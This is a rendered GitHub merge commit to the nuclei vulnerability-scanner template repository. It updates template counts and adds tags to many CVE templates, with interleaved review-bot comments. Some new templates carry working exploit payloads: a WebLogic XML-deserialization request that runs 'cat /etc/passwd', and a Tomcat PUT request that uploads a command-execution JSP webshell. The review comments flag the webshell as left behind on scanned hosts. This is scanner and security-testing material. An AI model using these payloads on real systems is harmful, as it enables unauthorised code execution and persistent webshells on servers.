Merge pull request #9 from projectdiscovery/master

Update
patch-1
Dhiyaneshwaran 2021-02-13 12:36:00 +05:30 committed by GitHub
commit 810054af71
309 changed files with 1214 additions and 279 deletions


@ -12,10 +12,6 @@
# More details - https://github.com/projectdiscovery/nuclei#using-nuclei-ignore-file-for-template-exclusion
.pre-commit-config.yaml
cves/2013/CVE-2013-2251.yaml
cves/2017/CVE-2017-7529.yaml
cves/2020/CVE-2020-13379.yaml
cves/2020/CVE-2020-16139.yaml
# Fuzzing is excluded to avoid running bruteforce on every server as default.
fuzzing/
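Review bot: The hunk header (10 old lines, 6 new, nothing visibly added) means four entries left this exclusion list, and with the diff markers lost the only four candidates are the CVE paths shown, so CVE-2013-2251 (a Struts OGNL RCE template that sends payloads), CVE-2017-7529, CVE-2020-13379 and CVE-2020-16139 most plausibly now run in a default sweep; if that is the intent, the commit message should say so. The same commit also adds cves/2017/CVE-2017-12615.yaml, which PUTs a JSP onto the target, and cves/2017/CVE-2017-10271.yaml, which runs `cat /etc/passwd` through the `<java>` gadget in its SOAP header, and neither is listed here. Either add those two paths next to the remaining entries or tag them `intrusive` (the rConfig template in this commit already uses that tag) and exclude the tag, whichever mechanism this nuclei version supports. The comment on `fuzzing/` explains why that directory is excluded; a similar one-line comment above any RCE entries (`# Executes commands / writes files on the target; opt in explicitly`) would keep the rationale next to the list.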


@ -28,13 +28,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts |
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 165 | default-logins | 8 |
| cves | 176 | default-logins | 8 |
| dns | 6 | exposed-panels | 74 |
| exposed-tokens | 9 | exposures | 41 |
| exposed-tokens | 9 | exposures | 44 |
| fuzzing | 4 | helpers | 2 |
| miscellaneous | 12 | misconfiguration | 39 |
| takeovers | 1 | technologies | 46 |
| vulnerabilities | 75 | workflows | 17 |
| miscellaneous | 12 | misconfiguration | 40 |
| takeovers | 1 | technologies | 45 |
| vulnerabilities | 81 | workflows | 18 |
**Tree structure of nuclei templates:**
@ -57,7 +57,9 @@ An overview of the nuclei template directory including number of templates assoc
│   │   └── CVE-2014-6271.yaml
│   ├── 2017
│   │   ├── CVE-2017-10075.yaml
│   │   ├── CVE-2017-10271.yaml
│   │   ├── CVE-2017-11444.yaml
│   │   ├── CVE-2017-12615.yaml
│   │   ├── CVE-2017-12637.yaml
│   │   ├── CVE-2017-14537.yaml
│   │   ├── CVE-2017-14849.yaml
@ -86,6 +88,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2018-19439.yaml
│   │   ├── CVE-2018-20824.yaml
│   │   ├── CVE-2018-2791.yaml
│   │   ├── CVE-2018-3167.yaml
│   │   ├── CVE-2018-3714.yaml
│   │   ├── CVE-2018-3760.yaml
│   │   ├── CVE-2018-5230.yaml
@ -116,7 +119,6 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2019-16278.yaml
│   │   ├── CVE-2019-1653.yaml
│   │   ├── CVE-2019-16662.yaml
│   │   ├── CVE-2019-16759-1.yaml
│   │   ├── CVE-2019-16759.yaml
│   │   ├── CVE-2019-16920.yaml
│   │   ├── CVE-2019-17382.yaml
@ -133,6 +135,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2019-3396.yaml
│   │   ├── CVE-2019-3402.yaml
│   │   ├── CVE-2019-3799.yaml
│   │   ├── CVE-2019-5127.yaml
│   │   ├── CVE-2019-5418.yaml
│   │   ├── CVE-2019-6112.yaml
│   │   ├── CVE-2019-6340.yaml
@ -145,6 +148,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2019-8451.yaml
│   │   ├── CVE-2019-8903.yaml
│   │   ├── CVE-2019-8982.yaml
│   │   ├── CVE-2019-9041.yaml
│   │   ├── CVE-2019-9670.yaml
│   │   ├── CVE-2019-9733.yaml
│   │   ├── CVE-2019-9955.yaml
@ -163,10 +167,12 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2020-13942.yaml
│   │   ├── CVE-2020-14179.yaml
│   │   ├── CVE-2020-14181.yaml
│   │   ├── CVE-2020-14815.yaml
│   │   ├── CVE-2020-14864.yaml
│   │   ├── CVE-2020-14882.yaml
│   │   ├── CVE-2020-15129.yaml
│   │   ├── CVE-2020-15505.yaml
│   │   ├── CVE-2020-15568.yaml
│   │   ├── CVE-2020-15920.yaml
│   │   ├── CVE-2020-16846.yaml
│   │   ├── CVE-2020-16952.yaml
@ -182,6 +188,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2020-24223.yaml
│   │   ├── CVE-2020-24312.yaml
│   │   ├── CVE-2020-24579.yaml
│   │   ├── CVE-2020-25213.yaml
│   │   ├── CVE-2020-2551.yaml
│   │   ├── CVE-2020-25540.yaml
│   │   ├── CVE-2020-26214.yaml
@ -218,8 +225,12 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── CVE-2020-9496.yaml
│   │   └── CVE-2020-9757.yaml
│   └── 2021
│   ├── CVE-2021-22122.yaml
│   ├── CVE-2021-22873.yaml
│   ├── CVE-2021-25646.yaml
│   ├── CVE-2021-26710.yaml
│   ├── CVE-2021-26722.yaml
│   ├── CVE-2021-26723.yaml
│   └── CVE-2021-3019.yaml
├── default-logins
│   ├── activemq
@ -349,6 +360,7 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── amazon-docker-config-disclosure.yaml
│   │   ├── ansible-config-disclosure.yaml
│   │   ├── composer-config.yaml
│   │   ├── docker-compose-config.yml
│   │   ├── exposed-svn.yaml
│   │   ├── git-config-nginxoffbyslash.yaml
│   │   ├── git-config.yaml
@ -373,6 +385,8 @@ An overview of the nuclei template directory including number of templates assoc
│   │   ├── ds_store.yaml
│   │   ├── exposed-alps-spring.yaml
│   │   ├── filezilla.yaml
│   │   ├── golang-metrics.yaml
│   │   ├── keycloak-json.yaml
│   │   ├── lazy-file.yaml
│   │   ├── server-private-keys.yaml
│   │   └── xprober-service.yaml
@ -429,12 +443,13 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── larvel-debug.yaml
│   ├── linkerd-ssrf-detect.yaml
│   ├── manage-engine-ad-search.yaml
│   ├── misconfigured-docker.yaml
│   ├── nginx-status.yaml
│   ├── php-errors.yaml
│   ├── php-fpm-status.yaml
│   ├── put-method-enabled.yaml
│   ├── rack-mini-profiler.yaml
│   ├── salesforce-aura-misconfig.yaml
│   ├── salesforce-aura.yaml
│   ├── server-status-localhost.yaml
│   ├── shell-history.yaml
│   ├── sidekiq-dashboard.yaml
@ -460,7 +475,6 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── bigip-config-utility-detect.yaml
│   ├── cacti-detect.yaml
│   ├── clockwork-php-page.yaml
│   ├── couchdb-detect.yaml
│   ├── detect-springboot-actuator.yaml
│   ├── favicon-detection.yaml
│   ├── firebase-detect.yaml
@ -516,9 +530,12 @@ An overview of the nuclei template directory including number of templates assoc
│   │   └── unauthenticated-jenkin-dashboard.yaml
│   ├── jira
│   │   ├── jira-service-desk-signup.yaml
│   │   ├── jira-unauthenticated-adminprojects.yaml
│   │   ├── jira-unauthenticated-dashboards.yaml
│   │   ├── jira-unauthenticated-popular-filters.yaml
│   │   ├── jira-unauthenticated-projectcategories.yaml
│   │   ├── jira-unauthenticated-projects.yaml
│   │   ├── jira-unauthenticated-resolutions.yaml
│   │   └── jira-unauthenticated-user-picker.yaml
│   ├── moodle
│   │   ├── moodle-filter-jmol-lfi.yaml
@ -528,6 +545,7 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── other
│   │   ├── CNVD-2020-62422.yaml
│   │   ├── acme-xss.yaml
│   │   ├── apache-flink-unauth-rce.yaml
│   │   ├── aspnuke-openredirect.yaml
│   │   ├── bullwark-momentum-lfi.yaml
│   │   ├── cached-aem-pages.yaml
@ -562,6 +580,9 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── springboot
│   │   ├── springboot-actuators-jolokia-xxe.yaml
│   │   └── springboot-h2-db-rce.yaml
│   ├── thinkcmf
│   │   ├── thinkcmf-lfi.yaml
│   │   └── thinkcmf-rce.yaml
│   ├── thinkphp
│   │   ├── thinkphp-2-rce.yaml
│   │   ├── thinkphp-5022-rce.yaml
@ -605,12 +626,13 @@ An overview of the nuclei template directory including number of templates assoc
├── springboot-workflow.yaml
├── thinkphp-workflow.yaml
├── vbulletin-workflow.yaml
├── weblogic-workflow.yaml
└── wordpress-workflow.yaml
```
</details>
**55 directories, 508 files**.
**56 directories, 529 files**.
📖 Documentation
-----


@ -3,6 +3,7 @@ info:
name: CVE-2005-2428
author: CasperGN
severity: medium
tags: cve,cve2005
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: AppServ Open Project 2.5.10 and earlier XSS
author: unstabl3
severity: medium
tags: cve,cve2008,xss
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: exploitation & @dwisiswant0
severity: critical
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
tags: cve,cve2013,rce
requests:
- payloads:


@ -5,6 +5,7 @@ info:
author: pentest_swissky
severity: high
description: Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications
tags: cve,cve2014,rce
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: madrobot
severity: medium
description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site.
tags: cve,cve2017,xss,oracle
requests:
- method: GET


@ -0,0 +1,67 @@
id: CVE-2017-10271
info:
name: CVE-2017-10271
author: dr_set
severity: high
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
reference: https://github.com/vulhub/vulhub/tree/fda47b97c7d2809660a4471539cd0e6dbf8fac8c/weblogic/CVE-2017-10271
tags: cve,cve2017,rce,oracle,weblogic
# Source:- https://github.com/SuperHacker-liuan/cve-2017-10271-poc
requests:
- raw:
- |
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 5178
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<void class="weblogic.utils.Hex" method="fromHexString" id="cls">
<string>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</string>
</void>
<void class="org.mozilla.classfile.DefiningClassLoader">
<void method="defineClass">
<string>com.supeream.exploits.XmlExp</string>
<object idref="cls"></object>
<void method="newInstance">
<void method="say" id="proc">
<string>cat /etc/passwd</string>
</void>
</void>
</void>
</void>
<void class="java.lang.Thread" method="currentThread">
<void method="getCurrentWork">
<void method="getResponse">
<void method="getServletOutputStream">
<void method="writeStream">
<object idref="proc"></object>
</void>
<void method="flush"/>
</void>
<void method="getWriter"><void method="write"><string></string></void></void>
</void>
</void>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
matchers:
- type: regex
regex:
- 'root:[x*]:0:0'
part: body
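Review bot: This template executes `cat /etc/passwd` on the target (the `say` call under `DefiningClassLoader.defineClass`) and streams the output back through the servlet response, yet `tags:` carries no `intrusive` marker, unlike the rConfig template added in this same commit; change the line to `tags: cve,cve2017,rce,oracle,weblogic,intrusive` so default runs can exclude it. The description copied from the advisory says the attacker reaches the server "via T3", but the request here is a plain HTTP POST to /wls-wsat/CoordinatorPortType, so a reader triaging hits will look at the wrong port — reword to `Unauthenticated RCE via XML deserialization in the wls-wsat web service (HTTP)`. `Content-Length: 5178` is hard-coded for a body whose hex class blob is not visible in this rendering; if nuclei does not recompute it from the body, any edit to the payload silently desynchronises the request, so either drop the header or add `# keep in sync with the body below` next to it.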


@ -5,6 +5,7 @@ info:
author: dwisiswant0
severity: high
description: Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array.
tags: cve,cve2017,sqli,subrion
# Source:
# - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q


@ -0,0 +1,50 @@
id: CVE-2017-12615
info:
name: Apache Tomcat RCE
author: pikpikcu
severity: critical
tags: cve,cve2017,apache,rce
reference: https://github.com/vulhub/vulhub/tree/master/tomcat/CVE-2017-12615
description: |
By design, you are not allowed to upload JSP files via the PUT method on the Apache Tomcat servers.
This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server.
However, due to the insufficient checks, an attacker could gain remote code execution on 7.0.{0 to 79}
Tomcat servers that has enabled PUT by requesting PUT method on the Tomcat server using a specially crafted HTTP request.
requests:
- method: PUT
path:
- "{{BaseURL}}/poc.jsp/"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
out.println("Command: " + request.getParameter("cmd") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
- method: GET
path:
- "{{BaseURL}}/poc.jsp?cmd=cat+%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
part: body
- type: status
status:
- 200
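Review bot: The PUT body is a complete unauthenticated command-execution JSP (`request.getParameter("cmd")` fed straight into `Runtime.getRuntime().exec`) and nothing removes it afterwards, so every positive hit leaves a working webshell at /poc.jsp on the scanned host for anyone who finds it. A benign expression proves that the file was stored and executed just as well: I'd upload `<%= 1337 * 1337 %>`, fetch /poc.jsp without parameters and match the literal `1787569`, which also retires the `cmd=cat+%2Fetc%2Fpasswd` request. Because a file is still written to the target, the template should additionally be tagged `tags: cve,cve2017,apache,rce,intrusive`, matching the rConfig template in this commit. The vulnerable range in the description (`7.0.{0 to 79}`) reads oddly as YAML prose; `Apache Tomcat 7.0.0 through 7.0.79` is clearer.
```yaml
# … unchanged: id/info (add `intrusive` to tags) …
requests:
  - method: PUT
    path:
      - "{{BaseURL}}/poc.jsp/"
    # … unchanged: headers …
    body: |
      <%= 1337 * 1337 %>
  - method: GET
    path:
      - "{{BaseURL}}/poc.jsp"
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "1787569"
        part: body
      # … unchanged: status 200 matcher …
```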


@ -5,6 +5,7 @@ info:
author: apt-mirror
severity: high
description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.
tags: cve,cve2017,sap,traversal
# References:
# - [1] https://www.cvedetails.com/cve/CVE-2017-12637/


@ -4,6 +4,7 @@ info:
name: trixbox 2.8.0 - directory-traversal
author: pikpikcu
severity: medium
tags: cve,cve2017,trixbox,traversal
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537
# https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/


@ -5,6 +5,7 @@ info:
author: Random-Robbie
severity: high
description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
tags: cve,cve2017,nodejs,traversal
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: "Struts2 RCE "
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
tags: cve,cve2017,struts,rce
# This template supports the detection part only.
# Do not test any website without permission


@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: medium
description: A Cross-Site Scripting (XSS) was discovered in 'Magmi 0.7.22'. The vulnerability exists due to insufficient filtration of user-supplied data (prefix) passed to the 'magmi-git-master/magmi/web/ajax_gettime.php' URL.
tags: cve,cve2017,magmi,xss
# Issues:-https://github.com/dweeves/magmi-git/issues/522
# Download:-https://github.com/dweeves/magmi-git/releases/download/0.7.22/magmi_full_0.7.22.zip


@ -5,7 +5,7 @@ info:
author: bp0lr & dwisiswant0
severity: high
description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
tags: cve,cve2017,mantisbt
# THIS TEMPLATE IS ONLY FOR DETECTING
# To carry out further attacks, please see reference[2] below.


@ -5,6 +5,7 @@ info:
author: pd-team
severity: high
description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
tags: cve,cve2017,atlassian,jira,ssrf
requests:
- method: GET


@ -5,6 +5,8 @@ info:
author: Random-Robbie
severity: high
description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
tags: cve,cve2017,php,phpunit,rce
# Reference to exploit
# https://github.com/cyberharsh/Php-unit-CVE-2017-9841
# https://github.com/RandomRobbieBF/phpunit-brute


@ -4,6 +4,8 @@ info:
name: Cisco ASA path traversal vulnerability
author: organiccrap
severity: medium
tags: cve,cve2018,cisco,traversal
# https://github.com/yassineaboukir/CVE-2018-0296
# curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
# if vulnerable, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number


@ -5,6 +5,7 @@ info:
author: mavericknerd @0h1in9e
severity: high
description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
tags: cve,cve2018,jolokia,xss
requests:
- method: GET


@ -4,8 +4,8 @@ info:
name: Splunk Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
# source:- https://nvd.nist.gov/vuln/detail/CVE-2018-11409
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-11409
tags: cve,cve2018,splunk
requests:
- method: GET


@ -4,8 +4,8 @@ info:
name: Apache Tomcat JK Status Manager Access
author: Harsh Bothra
severity: medium
# Source:- https://github.com/immunIT/CVE-2018-11759
reference: https://github.com/immunIT/CVE-2018-11759
tags: cve,cve2018,apache
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: RSA Authentication Manager XSS
author: madrobot
severity: medium
tags: cve,cve2018,xss,flash
requests:
- method: GET


@ -4,7 +4,8 @@ info:
name: Spring MVC Directory Traversal Vulnerability
author: hetroublemakr
severity: high
# reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
tags: cve,cve2018,spring,traversal
requests:
- method: GET


@ -11,6 +11,8 @@ info:
An unauthenticated remote malicious user (or attacker) can supply
specially crafted request parameters against Spring Data REST backed HTTP resources
or using Spring Datas projection-based request payload binding hat can lead to a remote code execution attack.
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-1273
tags: cve,cve2018,vmware,rce
requests:
- payloads:


@ -4,6 +4,7 @@ info:
name: FortiOS - Credentials Disclosure
author: organiccrap
severity: high
tags: cve,cve2018,fortios
requests:
- method: GET


@ -7,6 +7,7 @@ info:
description: A Cross-site Scripting (XSS) vulnerability in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
type: XSS
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-13380
tags: cve,cve2018,fortios,xss
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Django Open Redirect
author: pikpikcu
severity: low
tags: cve,cve2018,django,redirect
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Responsive filemanager 9.13.1 - SSRF/LFI
author: madrobot
severity: high
tags: cve,cve2018,ssrf,lfi
requests:
- method: POST


@ -4,7 +4,9 @@ info:
name: Nuxeo Authentication Bypass Remote Code Execution
author: madrobot
severity: high
description: Nuxeo Authentication Bypass Remote Code Execution &lt; 103 using a SSTI
description: Nuxeo Authentication Bypass Remote Code Execution < 10.3 using a SSTI
tags: cve,cve2018,nuxeo,ssti,rce
requests:
- method: GET
path:
@ -13,4 +15,4 @@ requests:
- type: word
words:
- "31333333337"
part: body
part: body


@ -4,6 +4,7 @@ info:
name: fuelCMS 1.4.1 - Remote Code Execution
author: pikpikcu
severity: critical
tags: cve,cve2018,fuelcms,rce
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1


@ -5,6 +5,7 @@ info:
author: dwisiswant0
severity: critical
description: Comodo Firewall & Central Manager (UTM) All Release before 2.7.0 & 1.5.0 Remote Code Execution (Web Shell based)
tags: cve,cve2018,comodo,rce
# References:
# - https://www.exploit-db.com/exploits/48825


@ -5,6 +5,7 @@ info:
author: nadino
severity: medium
description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
tags: cve,cve2018,wordpress,xss
requests:
- method: POST


@ -4,8 +4,8 @@ info:
name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
author: pikpikcu
severity: medium
# Refrence:-https://www.cvedetails.com/cve/CVE-2018-19386/
refrence: https://www.cvedetails.com/cve/CVE-2018-19386/
tags: cve,cve2018,solarwinds,xss
requests:
- method: GET
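Review bot: The new `refrence:` key is misspelled, so whatever reads `info.reference` (the key this same commit introduces for the Splunk and Tomcat JK Status templates) will not find this URL; change it to `reference: https://www.cvedetails.com/cve/CVE-2018-19386/`. The same misspelling appears as `refrense:` in the Solr, Openfire and Email Subscribers templates of this commit, so a one-off grep for `refr` before merging would catch all four.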


@ -5,6 +5,7 @@ info:
author: madrobot & dwisiswant0
severity: high
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
tags: cve,cve2018,oracle,xss
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: madrobot & dwisiswant0
severity: medium
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
tags: cve,cve2018,atlassian,jira,xss
requests:
- method: GET


@ -5,6 +5,8 @@ info:
author: madrobot
severity: medium
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
tags: cve,cve2018,oracle,xss
requests:
- method: GET
path:


@ -0,0 +1,25 @@
id: CVE-2018-3167
info:
name: Unauthenticated Blind SSRF in Oracle EBS
author: geeknik
severity: low
description: https://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145
tags: cve,cve2018,oracle,ebs,ssrf
requests:
- method: POST
path:
- '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://localhost:80">
matchers-condition: and
matchers:
- type: word
words:
- 'Unexpected text in DTD'
part: body
- type: status
status:
- 200
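Review bot: `description:` holds only a URL, which is what this commit's `reference:` key is for (see the Splunk and Spring MVC hunks); move the link to `reference:` and give the template a real one-line description, e.g. `lcmServiceController.jsp parses an attacker-supplied DOCTYPE and attempts to fetch its external DTD, so the 'Unexpected text in DTD' error reveals the fetch was made (blind SSRF, unauthenticated)`. The POST sends an XML DOCTYPE without any `Content-Type` header; I can't confirm from here whether the servlet keys on it, but the other XML templates in this commit set one, so `Content-Type: text/xml` under a `headers:` map would be consistent and safer. The external DTD points at `http://localhost:80`, which is exactly the kind of loopback fetch an SSRF probe should make; a short comment saying the target is deliberately the server itself would stop someone "fixing" it to an external host.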


@ -3,6 +3,8 @@ info:
name: node-srv Path Traversal
author: madrobot
severity: high
reference: https://hackerone.com/reports/309124
tags: cve,cve2018,nodejs,traversal
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Rails CVE-2018-3760
author: 0xrudra
severity: high
tags: cve,cve2018,rails,traversal
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Atlassian Confluence Status-List XSS
author: madrobot
severity: medium
tags: cve,cve2018,atlassian,confluence,xss
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: AnchorCMS Error Log Exposure
author: pd-team
severity: medium
tags: cve,cve2018,anchorcms,logs
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: uWSGI PHP Plugin Directory Traversal
author: madrobot
severity: high
tags: cve,cve2018,uwsgi,php,traversal
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Apache ActiveMQ XSS
author: pd-team
severity: medium
tags: cve,cve2018,apache,activemq,xss
requests:
- method: GET


@ -5,6 +5,7 @@ info:
author: pikpikcu
severity: high
description: XXE injection (file disclosure) exploit for Apache OFBiz 16.11.04
tags: cve,cve2018,apache,ofbiz,xxe
requests:
- raw:


@ -4,6 +4,7 @@ info:
name: Apache mod_proxy HTML Injection / Partial XSS
author: pd-team
severity: medium
tags: cve,cve2019,apache,htmli
requests:
- method: GET


@ -4,8 +4,9 @@ info:
name: Timesheet 1.5.3 - Cross Site Scripting
author: pikpikcu
severity: high
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
tags: cve,cve2019,timesheet,xss
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2019-1010287
# Google-Dork: inurl:"/timesheet/login.php"
# Demo: http://www.mdh-tz.info/


@ -4,6 +4,7 @@ info:
name: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
author: madrobot
severity: medium
tags: cve,cve2019,jenkins,xss
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: exposed_pprof
author: 0xceeb
severity: medium
tags: cve,cve2019,debug
# https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0
# http://mmcloughlin.com/posts/your-pprof-is-showing


@ -4,7 +4,8 @@ info:
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
author: organiccrap
severity: high
# https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
tags: cve,cve2019,pulsesecure,traversal
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
author: dwisiswant0
severity: critical
tags: cve,cve2019,atlassian,rce
# Atlassian Crowd and Crowd Data Center
# had the pdkinstall development plugin incorrectly enabled in release builds.


@ -6,9 +6,7 @@ info:
author: ree4pwn
severity: critical
reference: https://github.com/jas502n/CVE-2019-11581
product: Jira
# This is detection template only, use the referenced link for the exploitation.
tags: cve,cve2019,atlassian,jira,ssti,rce
requests:
- method: GET
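Review bot: Dropping the `# This is detection template only, use the referenced link for the exploitation.` line leaves nothing in the remaining info block saying that a hit is an unconfirmed version/feature check rather than proven RCE, which matters for a `critical` severity; keep the caveat as `description: Detection only - confirms the vulnerable Jira feature is reachable; see reference for the SSTI exploitation chain.` rather than a comment so it survives into scan output. `product: Jira` also went away without a replacement, so the `jira` tag is now the only product marker; that is fine if the tag is the repo's convention, but the description above would record it too. The request and matchers are outside this hunk.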


@ -15,6 +15,7 @@ info:
References:
- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
- https://wpscan.com/vulnerability/9254
tags: cve,cve2019,wordpress,wp-plugin,xss
requests:
- raw:


@ -4,6 +4,7 @@ info:
name: Deltek Maconomy 2.2.5 LFIl
author: madrobot
severity: high
tags: cve,cve2019,lfi
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: WebPort 1.19.1 - Reflected Cross-Site Scripting
author: pikpikcu
severity: medium
tags: cve,cve2019,xss
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/


@ -4,6 +4,7 @@ info:
name: IIceWarp <=10.4.4 - Local File Inclusion
author: pikpikcu
severity: high
tags: cve,cve2019,lfi
# reference: https://nvd.nist.gov/vuln/detail/CVE-2019-12593
# Google Dork:-Powered By IceWarp 10.4.4


@ -12,6 +12,7 @@ info:
references: |
- https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
- https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
tags: cve,cve2019,rce
requests:
- method: GET


@ -4,6 +4,7 @@ info:
name: Alfresco Share Open Redirect
author: pd-team
severity: low
tags: cve,cve2019,redirect
requests:
- method: POST


@ -4,6 +4,7 @@ info:
name: Odoo 12.0 - Local File Inclusion
author: madrobot
severity: high
tags: cve,cve2019,lfi
requests:
- method: GET


@ -4,9 +4,8 @@ info:
name: Open-Scool 3.0/Community Edition 2.3 - Cross Site Scripting
author: pikpikcu
severity: medium
